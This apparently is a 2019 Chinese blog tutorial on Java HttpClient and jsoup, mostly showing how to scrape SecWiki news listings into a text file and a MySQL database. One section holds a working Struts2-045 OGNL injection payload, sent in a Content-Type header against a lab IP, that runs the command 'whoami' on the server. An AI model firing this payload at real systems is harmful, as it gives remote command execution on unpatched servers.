爬取SecWiki安全技术网站技术到mysql数据库中

1、获取数据

使用httpClient发送请求

        <!-- 第一步: 导包 -->
        <dependency>
            <groupId>org.apache.httpcomponents</groupId>
            <artifactId>httpclient</artifactId>
            <version>4.3.1</version>
        </dependency>    

1.1尝试使用代码发起一个GET请求。

package cn.test.requestdata;

import org.apache.http.Header;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;

import java.io.IOException;

public class HttpClientGet {

    public static void main(String[] args){

        new Get().start();
    }
}
class Get extends Thread{

    //发送请求, 获取数据
    CloseableHttpClient httpClient = HttpClients.createDefault();  // 获取httpClient对象

    public void run(){

        //确定url
        String url = "http://192.168.174.133:8080/struts2/";
        //创建请求方式
        HttpGet httpGet = new HttpGet(url);

        //设置请求参数: 请求头
        httpGet.setHeader("user-agent","Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36");

        try {
            //发送请求, 获得响应对象
            // CloseableHttpResponse包含了响应行, 响应头, 响应体
            CloseableHttpResponse response = httpClient.execute(httpGet);

            //获取数据
            String html = EntityUtils.toString(response.getEntity(), "UTF-8");

            System.out.println(html);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

1.2尝试使用代码发起一个POST请求。

package cn.test.requestdata;

import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;

import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

public class HttpClientPost {

    public static void main(String[] args){
        new Post().start();

    }
}

class Post extends Thread{

    //获取httpClient实例,用来执行请求
    CloseableHttpClient httpClient= HttpClients.createDefault();
    public void run(){
        //指定url
        String url="http://192.168.174.133:8080/struts2/";

        //指定发送方式  post
        HttpPost httpPost=new HttpPost(url);

        try {
            //封装参数
            List<NameValuePair> list = new ArrayList<NameValuePair>();
            list.add(new BasicNameValuePair("userName","天心"));
            list.add(new BasicNameValuePair("password", "996"));
            HttpEntity entity = new UrlEncodedFormEntity(list);
            httpPost.setEntity(entity);

            //执行请求
            CloseableHttpResponse response = httpClient.execute(httpPost);

            //获取数据
            String html= EntityUtils.toString(response.getEntity(),"utf-8");
            System.out.println(html);

        } catch (IOException e) {
            e.printStackTrace();
        }
    }

}

1.3尝试使用代码编写一个检测Struts2-045漏洞的poc

package cn.test.requestdata;

import org.apache.http.Header;
import org.apache.http.HttpEntity;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.util.EntityUtils;

import java.io.IOException;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

public class Struts045 {

    public static void main(String[] args){
        HttpClientPost();
    }

    public static void HttpClientPost(){
        String url = "http://192.168.174.133:8080/struts2/";
        //打印回显
        //String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))." + "(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('exist Struts045')).(#o.close())}";

        //探测路径
        //String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(#req.getRealPath(\"/\"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}";

        //命令执行
        String payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}";

        //文件上传
        //String payload ="";

        //获取httpClient实例,用来执行请求
        CloseableHttpClient httpClient= HttpClients.createDefault();

        //指定发送方式  post
        HttpPost httpPost=new HttpPost(url);

        httpPost.setHeader("Content-Type", payload);
        httpPost.setHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36");

        try {
            //封装参数
            List<NameValuePair> list = new ArrayList<NameValuePair>();
            list.add(new BasicNameValuePair("userName","天心"));
            list.add(new BasicNameValuePair("password", "996"));
            HttpEntity entity = new UrlEncodedFormEntity(list);
            httpPost.setEntity(entity);

            //执行请求
            CloseableHttpResponse response = httpClient.execute(httpPost);

            //获取数据
            String html= EntityUtils.toString(response.getEntity(),"utf-8");
            System.out.println(html);
        
        } catch (IOException e) {
            e.printStackTrace();
        }

    }

}

命令执行检测效果如下:

 

2、解析数据

使用jsoup解析数据

<!-- 第一步: 导包 -->
<dependency>
    <groupId>org.jsoup</groupId>
    <artifactId>jsoup</artifactId>
    <version>1.10.2</version>
</dependency>

使用jsoup的前提, 需要先获取到document对象。本次使用基于css的选择器来解析HTML文档。

2.1 爬取SecWiki安全技术网站技术到本地txt中

package cn.test.spider1;

import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

import java.io.*;


public class SpiderSecwikitxt {

    public static void main(String[] args) throws IOException, InterruptedException {

        //确定url地址
        String urll="https://www.sec-wiki.com/news?News_page=";

        for(int i=1;i<11;i++){
            String url=urll+i;
            getUrl(url);
        }
    }

    private static void getUrl(String url) throws IOException {
        //获取httpclient对象
        CloseableHttpClient httpClient = HttpClients.createDefault();

        //获取请求方式
        HttpGet httpGet=new HttpGet(url);

        //执行请求
        CloseableHttpResponse response = httpClient.execute(httpGet);

        //获取页面
        String html= EntityUtils.toString(response.getEntity(),"utf-8");
        //System.out.println(html);

        //解析网页
        Document document= Jsoup.parse(html);

        //获取网页所有的表格
        Elements element = document.select("[class=items table]").select("tr");
        //System.out.println(element.text());

        FileOutputStream fos=null;
        for(int i=0;i<element.size()-1;i++){//遍历每一个行
            fos = new FileOutputStream("D://spider//spider.txt",true);

            //获取每一行的列
            Elements tds = element.get(i).select("td:first-child");
            String time = tds.text();
            //获取time
            System.out.print(time+" ");

            Elements select = element.get(i).select("td:nth-child(2)");
            String title = select.text();
            //获取title
            System.out.print(title+" ");

            //获取url链接
            String href = element.get(i).select("td>a").attr("href");
            System.out.println(href+" ");

            fos.write(time.getBytes());
            fos.write(" ".getBytes());

            fos.write(title.getBytes());
            fos.write(" ".getBytes());

            fos.write(href.getBytes());
            fos.write("\r\n".getBytes());
        }
     fos.close(); } }

txt效果如下

2.2爬取SecWiki安全技术网站技术到本地mysql数据库中

主函数

package cn.test.spider1;

import cn.test.mapper.EventDao;
import cn.test.pojo.Event;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.select.Elements;

import java.io.IOException;

public class SpiderSecwikimysql {

    private static EventDao eventDao = new EventDao();


    public static void main(String[] args) throws IOException {

        //确定url地址
        String urll="https://www.sec-wiki.com/news?News_page=";

        for(int i=1;i<11;i++){

            String url=urll+i;
            getUrl(url);

        }
    }

    private static void getUrl(String url) throws IOException {
        //获取httpclient对象
        CloseableHttpClient httpClient = HttpClients.createDefault();

        //获取请求方式
        HttpGet httpGet=new HttpGet(url);

        //执行请求
        CloseableHttpResponse response = httpClient.execute(httpGet);

        //获取页面
        String html= EntityUtils.toString(response.getEntity(),"utf-8");
        //System.out.println(html);

        //解析网页
        Document document= Jsoup.parse(html);

        //获取网页所有的表格
        Elements element = document.select("[class=items table]").select("tr");
        //System.out.println(element.text());
        for(int i=0;i<element.size()-1;i++){//遍历每一个行
            Event event=new Event();

            //获取每一行的列
            Elements tds = element.get(i).select("td:first-child");
            String time = tds.text();
            //获取time
            System.out.print(time+" ");
            event.setTime(time);

            Elements select = element.get(i).select("td:nth-child(2)");
            String title = select.text();
            //获取title
            System.out.print(title+" ");
            event.setTitle(title);


            //获取url链接
            String href = element.get(i).select("td>a").attr("href");
            System.out.println(href);
            event.setUrl(href);

            //进行保存数据
            eventDao.addEvent(event);
        }

    }
}

通过EventDao类保存到mysql数据库中

package cn.test.mapper;

import cn.test.pojo.Event;
import com.mchange.v2.c3p0.ComboPooledDataSource;
import org.springframework.jdbc.core.JdbcTemplate;

import java.beans.PropertyVetoException;

public class EventDao extends JdbcTemplate{

    public EventDao(){
        ComboPooledDataSource dataSource=new ComboPooledDataSource();
        //数据库的四大必要参数: driver 连接字符串 用户名 密码
        try {
            dataSource.setDriverClass("com.mysql.jdbc.Driver");
            dataSource.setJdbcUrl("jdbc:mysql://localhost:3306/spider?characterEncoding=UTF-8");
            dataSource.setUser("root");
            dataSource.setPassword("root");
        } catch (PropertyVetoException e) {
            e.printStackTrace();
        }

        //将DataSource设置到jdbcTemplate
        super.setDataSource(dataSource);

    }

    //添加事件数据的方法
    public void addEvent(Event event){

        String sql="insert into spidersecwiki values(?,?,?)";
        String[] params ={event.getTime(),event.getTitle(),event.getUrl()};
        update(sql,params);
    }

}

定义Event类

package cn.test.pojo;

public class Event {

    /**
     * 事件时间
     */
    private String time;

    /**
     * 事件主题
     */
    private String title;


    /**
     * 事件url地址
     */
    private String url;


    public Event() {
    }

    public Event(String time, String title, String url) {
        this.time = time;
        this.title = title;
        this.url = url;
    }

    public String getTime() {
        return time;
    }

    public void setTime(String time) {
        this.time = time;
    }

    public String getTitle() {
        return title;
    }

    public void setTitle(String title) {
        this.title = title;
    }

    public String getUrl() {
        return url;
    }

    public void setUrl(String url) {
        this.url = url;
    }

    @Override
    public String toString() {
        return "Event{" +
                "time='" + time + '\'' +
                ", title='" + title + '\'' +
                ", url='" + url + '\'' +
                '}';
    }
}

存入mysql数据库中如下:

 

posted on 2019-06-28 10:58  wmiot  阅读(429)  评论(0编辑  收藏  举报